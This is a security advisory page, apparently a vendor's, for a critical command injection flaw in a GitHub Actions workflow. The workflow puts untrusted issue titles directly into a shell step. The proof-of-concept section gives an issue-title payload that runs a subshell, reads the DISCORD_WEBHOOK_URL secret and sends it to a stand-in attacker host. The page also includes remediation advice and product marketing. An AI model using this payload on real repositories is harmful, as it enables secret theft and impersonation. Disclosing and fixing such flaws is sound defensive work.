GHSA-F67F-HCR6-94MF

GHSA-F67F-HCR6-94MF is a critical-severity OS command injection vulnerability in SHAdd0WTAka/Zen-Ai-Pentest (actions), affecting versions <= 3.0.0. No fixed version is listed yet.

Summary

The ZenClaw Discord Integration GitHub Actions workflow is vulnerable to shell command injection. The issue title field, controllable by any GitHub user, is interpolated directly into a run shell block via a GitHub Actions template expression. An attacker can craft an issue title containing a subshell expression that executes arbitrary commands on the runner during variable assignment, enabling exfiltration of the DISCORD_WEBHOOK_URL secret. The trigger requires no repository privileges.

Affected Component

File: .github/workflows/zenclaw-discord.yml
Commit: 07e65c72656a8213fc9ece2b3f4fc719032cfc5d
URL: https://github.com/SHAdd0WTAka/Zen-Ai-Pentest/blob/07e65c72656a8213fc9ece2b3f4fc719032cfc5d/.github/workflows/zenclaw-discord.yml
Step: Prepare Notification
Trigger: issues: [opened], no repository privileges required

Description

In the Prepare Notification step, the issue title is assigned to a shell variable using direct GitHub Actions template interpolation inside a case block:

issues)
  ...
  DESCRIPTION="${{ github.event.issue.title }}"
  ;;

The GitHub Actions template engine resolves ${{ github.event.issue.title }} at workflow compilation time, embedding the raw issue title as literal text in the bash script before execution. The value is assigned inside a double-quoted string, which in bash evaluates subshell expressions of the form $(...) and backtick expressions `...` at runtime.

Although a subsequent sanitization step is applied:

DESCRIPTION=$(echo "$DESCRIPTION" | tr '\n' ' ' | cut -c1-1000)

This sanitization runs after the assignment, the subshell in the title has already executed by the time tr and cut process the output. The sanitization is therefore ineffective as a security control against command injection.

The resulting DESCRIPTION value is then written to $GITHUB_OUTPUT:

echo "description=$DESCRIPTION" >> $GITHUB_OUTPUT

This additional write is performed without a multiline-safe delimiter, enabling a secondary $GITHUB_OUTPUT injection if the title contains a newline, which could overwrite downstream output variables such as color or title.

Attack Vector

  1. Any GitHub user (no repository role required) opens an issue with a malicious title.
  2. The issues: opened trigger fires automatically, no human interaction or approval needed.
  3. The subshell expression in the title executes during variable assignment in the Prepare Notification step.
  4. The injected command runs with access to all secrets available to the runner.

Proof of Concept

An attacker opens an issue with the following title:

bug$(curl -s "https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)")

The rendered bash assignment becomes:

DESCRIPTION="bug$(curl -s "https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)")"

The subshell executes during assignment, sending the base64-encoded DISCORD_WEBHOOK_URL to the attacker's server before the sanitization step runs. The attacker can then use the stolen webhook URL to send arbitrary messages to the Discord channel impersonating the legitimate bot.

References

Impact

  • Confidentiality (High): Exfiltration of DISCORD_WEBHOOK_URL, granting the attacker the ability to send arbitrary messages to the Discord channel indefinitely, impersonating the ZenClaw bot.
  • Integrity (High): With the webhook URL, an attacker can post false security alerts, fake workflow failure notifications, or misleading status updates to the Discord channel, potentially causing incident response actions based on fabricated data.
  • Availability (None): No direct availability impact.

Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.

GHSA-F67F-HCR6-94MF has a CVSS score of 10.0 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

SHAdd0WTAka/Zen-Ai-Pentest (<= 3.0.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Pass all user-controlled event fields as environment variables and reference them via shell variables in the run block. Never use ${{ }} expressions inside run blocks for user-controlled data.

Vulnerable pattern:

run: |
  DESCRIPTION="${{ github.event.issue.title }}"

Safe pattern, declare in env:, reference as shell variable:

- name: Prepare Notification
  id: prep
  env:
    ISSUE_TITLE: ${{ github.event.issue.title }}
    COMMIT_MSG: ${{ github.event.head_commit.message }}
    WORKFLOW_NAME: ${{ github.event.workflow_run.name }}
    DISPATCH_MSG: ${{ github.event.inputs.message }}
    EVENT_ACTION: ${{ github.event.action }}
    WORKFLOW_CONCLUSION: ${{ github.event.workflow_run.conclusion }}
  run: |
    case "$EVENT" in
      issues)
        DESCRIPTION="$ISSUE_TITLE"
        ;;
      ...
    esac
    DESCRIPTION=$(echo "$DESCRIPTION" | tr '\n' ' ' | cut -c1-1000)

With values passed through env:, the Actions engine sets them as environment variables before the shell starts. Shell variable references ($ISSUE_TITLE) are expanded by bash at runtime without executing subshell expressions embedded in the value.

Frequently Asked Questions

  1. What is GHSA-F67F-HCR6-94MF? GHSA-F67F-HCR6-94MF is a critical-severity OS command injection vulnerability in SHAdd0WTAka/Zen-Ai-Pentest (actions), affecting versions <= 3.0.0. No fixed version is listed yet. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
  2. How severe is GHSA-F67F-HCR6-94MF? GHSA-F67F-HCR6-94MF has a CVSS score of 10.0 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of SHAdd0WTAka/Zen-Ai-Pentest are affected by GHSA-F67F-HCR6-94MF? SHAdd0WTAka/Zen-Ai-Pentest (actions) versions <= 3.0.0 is affected.
  4. Is there a fix for GHSA-F67F-HCR6-94MF? No fixed version is listed for GHSA-F67F-HCR6-94MF yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is GHSA-F67F-HCR6-94MF exploitable, and should I be worried? Whether GHSA-F67F-HCR6-94MF is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-F67F-HCR6-94MF is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-F67F-HCR6-94MF? No fixed version is listed yet. In the interim: Avoid passing untrusted input to shell commands. Use parameterized APIs or libraries that do not invoke a shell.

Other vulnerabilities in SHAdd0WTAka/Zen-Ai-Pentest

Stop the waste.
Protect your environment with Kodem.